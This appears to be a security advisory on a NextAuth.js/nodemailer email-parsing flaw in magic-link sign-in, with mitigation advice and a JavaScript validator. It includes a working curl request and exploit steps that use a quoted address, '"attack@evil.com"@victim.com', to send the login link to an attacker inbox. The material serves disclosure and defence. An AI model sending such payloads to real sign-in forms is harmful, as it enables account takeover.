NextAuth.js, Email Verification Vulnerability, CVE-2024-5319 (Critical)


The vulnerability stems from a parsing flaw in the nodemailer library that NextAuth.js uses for email-based (magic link) sign-in. When a user requests a sign-in, the application sends a verification email containing a magic link to the address submitted on the form, and that address passes through nodemailer's address parser. RFC 5322 permits a quoted local part, so a string such as `"attack@evil.com"@victim.com` is syntactically a single address whose local part is `"attack@evil.com"` and whose domain is `victim.com`. Because of the bug, nodemailer does not honor the quotes: it drops them and splits the string at the first `@`, yielding the local part `attack` and the domain `evil.com`, while the trailing `@victim.com` is discarded. Consequently the authentication email is delivered to `attack@evil.com`, an attacker-controlled inbox, rather than being rejected or handed to the `victim.com` mail server. The attacker can then open the login link, gain unauthorized access to the account tied to that identifier, and read any further sensitive mail the application sends to it.
Platform: NextAuth.js
Version: <=4.24.11, 5.0.0-beta.29
Vulnerability: Email Injection
Severity: Critical
Date: 2024

Prediction: Patch expected Q4 2024

What Undercode Say:

# Malicious sign-in attempt: the attacker's address is carried in the quoted local part.
# The csrfToken value is a placeholder; a real request must send the token returned by
# GET /api/auth/csrf together with the matching CSRF cookie. The provider id in the path
# is "nodemailer" for the v5 Nodemailer provider; the v4 Email provider uses "email".
curl -X POST http://localhost:3000/api/auth/signin/nodemailer \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d 'email=%22attack%40evil.com%22%40victim.com&csrfToken=abc123'

// The same payload, as the string the form field decodes to
const maliciousEmail = '"attack@evil.com"@victim.com';

How to Exploit:

Craft email payload.

Submit to sign-in endpoint.

Intercept verification email.

Hijack user account.

Protection from this CVE

Upgrade the nodemailer dependency to a release that contains the fix.

Validate the identifier strictly before it reaches the mailer: exactly one `@`, no quoted local part, no display name or comment syntax.

Restrict sign-in to an allowlist of domains, checked against the normalized identifier rather than the raw input.
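The following is an added example, not code from NextAuth.js or nodemailer. It serves both the description of the flaw above and the validation and allowlist advice in this list: `naiveParseRecipient` is a constructed model of the parse behaviour described (quotes dropped, split at the first `@`), written only to show what the payload collapses to; `strictNormalizeEmail` is the kind of check that belongs in front of the mailer. Function names, the regexes and the sample payload are assumptions made for the example. NextAuth's Email provider documents a `normalizeIdentifier` option in v4; a function of this shape is what would go there, but that hook is not verified here against the affected versions.

```javascript
// Added example (not NextAuth.js or nodemailer code): a constructed model of the
// flawed parse next to a strict validator that rejects such identifiers up front.

// Constructed sample payload: attacker's address as a quoted local part.
const PAYLOAD = '"attack@evil.com"@victim.com';

// Model of the flawed parse: drop the quotes, split at the FIRST '@', read the
// domain up to the next delimiter. Everything after the second '@' is lost, so
// the envelope recipient becomes the attacker's mailbox.
// This is a simplification written for the example, not nodemailer's parser.
function naiveParseRecipient(input) {
  const unquoted = input.replace(/"/g, '');
  const at = unquoted.indexOf('@');
  if (at === -1) return null;
  const local = unquoted.slice(0, at);
  const domain = unquoted.slice(at + 1).split(/[@\s<>,;]/)[0];
  return `${local}@${domain}`;
}

// Strict validator: dot-atom local part, hostname-shaped domain, exactly one '@',
// optional domain allowlist. Quoted local parts, comments and display names are
// rejected rather than interpreted, so nothing ambiguous reaches the mailer.
const LOCAL_RE = /^[a-z0-9!#$%&'*+\/=?^_`{|}~-]+(\.[a-z0-9!#$%&'*+\/=?^_`{|}~-]+)*$/;
const LABEL = '[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?';
const DOMAIN_RE = new RegExp(`^${LABEL}(\\.${LABEL})+$`);

function strictNormalizeEmail(input, allowedDomains = null) {
  if (typeof input !== 'string') throw new Error('identifier must be a string');
  const value = input.trim().toLowerCase();
  if (value.length > 254) throw new Error('identifier too long');
  const parts = value.split('@');
  if (parts.length !== 2) throw new Error('identifier must contain exactly one "@"');
  const [local, domain] = parts;
  if (local.length > 64 || !LOCAL_RE.test(local)) throw new Error('invalid local part');
  if (!DOMAIN_RE.test(domain)) throw new Error('invalid domain');
  if (allowedDomains && !allowedDomains.includes(domain)) {
    throw new Error(`domain not allowed: ${domain}`);
  }
  return `${local}@${domain}`;
}

// Runs both paths on one identifier and reports where each would send the mail.
function compare(identifier, allowedDomains = null) {
  let accepted = null;
  let rejection = null;
  try {
    accepted = strictNormalizeEmail(identifier, allowedDomains);
  } catch (err) {
    rejection = err.message;
  }
  return { flawedRecipient: naiveParseRecipient(identifier), accepted, rejection };
}

console.log(compare(PAYLOAD, ['victim.com']));
console.log(compare('Alice@Victim.com', ['victim.com']));
```

For the payload the flawed model yields `attack@evil.com` while the strict path rejects it on the `@` count alone; a plain `Alice@Victim.com` normalizes to `alice@victim.com` and passes the allowlist. The validator deliberately refuses valid-but-exotic RFC 5322 forms (quoted local parts, comments), which is the right trade for a login identifier.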

Impact:

Account takeover.

Information disclosure.

Privilege escalation.


Sources:

Reported By: github.com
